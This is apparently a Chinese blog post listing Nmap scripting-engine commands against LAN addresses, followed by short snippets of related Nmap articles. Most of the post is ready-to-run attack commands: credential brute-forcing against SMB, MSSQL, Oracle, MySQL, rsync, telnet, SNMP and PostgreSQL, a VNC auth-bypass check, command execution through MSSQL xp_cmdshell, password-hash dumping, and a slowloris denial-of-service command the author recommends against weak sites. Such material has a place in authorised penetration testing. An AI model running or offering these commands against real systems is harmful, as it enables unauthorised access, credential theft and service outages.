Nmap的高階掃瞄(指令碼)

2021-09-05 11:34:31 字數 3117 閱讀 4412

(1) nmap --script=auth 192.168.137.*

負責處理鑑權證書(繞開鑑權)的指令碼,也可以作為檢測部分應用弱口令

(2)nmap --script=brute 192.168.137.*

提供暴力破解的方式  可對資料庫,smb,snmp等進行簡單密碼的暴力猜解

(3)nmap --script=default 192.168.137.* 或者 nmap -sc 192.168.137.*

預設的指令碼掃瞄,主要是蒐集各種應用服務的資訊,收集到後,可再針對具體服務進行攻擊

(4)nmap --script=vuln 192.168.137.*

檢查是否存在常見漏洞

(5)nmap -n -p445 --script=broadcast 192.168.137.4

在區域網內探查更多服務開啟狀況

檢查vnc bypass

nmap  --script=realvnc-auth-bypass 192.168.137.4

(1)檢查vnc認證方式

nmap  --script=vnc-auth  192.168.137.4

獲取vnc資訊

nmap  --script=vnc-info  192.168.137.4

(2)smb掃瞄:

smb破解

nmap  --script=smb-brute.nse 192.168.137.4

smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

smb已知幾個嚴重漏

nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

檢視共享目錄

nmap -p 445  --script smb-ls --script-args 『share=e$,path=\,smbuser=test,smbpass=test』 192.168.137.4

檢視會話

nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

系統資訊

nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

(3)mssql掃瞄:

猜解mssql使用者名稱和密碼

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

xp_cmdshell 執行命令

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4

(4)dumphash值

nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4

掃瞄root空口令

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

列出所有mysql使用者

nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

(5)oracle掃瞄:

oracle sid掃瞄

nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5

oracle弱口令破解

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=orcl,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

(6)其他一些比較好用的指令碼

nmap --script=broadcast-netbios-master-browser 192.168.137.4   發現閘道器

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync

nmap --script informix-brute -p 9088 192.168.137.4    informix資料庫破解

nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

nmap -su --script snmp-brute 192.168.137.4            snmp破解

nmap -sv --script=telnet-brute 192.168.137.4          telnet破解

nmap --script=http-methods.nse 192.168.137.4 檢查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻擊,對於處理能力較小的站點還挺好用的 'half-http' connections

nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

nmap --script=smb-brute --script-args=userdb=/tmp/帳號字典.txt,passdb=/tmp/密碼字典.txt ip位址 -p 445

kali基於指令碼的掃瞄工具 Nmap

kali系統在 usr share nmap scripts 裡放著各種掃瞄指令碼 說下幾種常用的掃瞄指令碼型別 漏洞利用 vuln 許可權驗證 auth 暴力破解 brute 服務資訊發現 discovery dos攻擊 dos 當然還有很多。使用命令 nmap script 指令碼名稱 引數 目...

Nmap高階使用(指令碼篇)

先用以下命名掃瞄目標機器或者目標c段都跑了什麼服務 也可以用下面的指令碼先嘗試獲取下目標機器更詳細的服務banner資訊 nmap st pn open v banner.nse 192.168.3.23 ftp anon.nse 檢查目標ftp是否允許匿名登入,光能登陸還不夠,它還會自動檢測目錄是...

強悍的nmap掃瞄工具

首先,簡單列舉乙個掃瞄埠的運用 nmap st sv p80,443,8080 p0 n ip 說明 st,說明是tcp協議 sv,說明是顯示詳情 p後面跟指定的掃瞄埠 n 後面對應的ip 一,簡介 nmap是乙個網路連線端掃瞄 軟體,用來掃瞄網上電腦開放的網路連線端。確定哪些 服務執行在哪些連線端...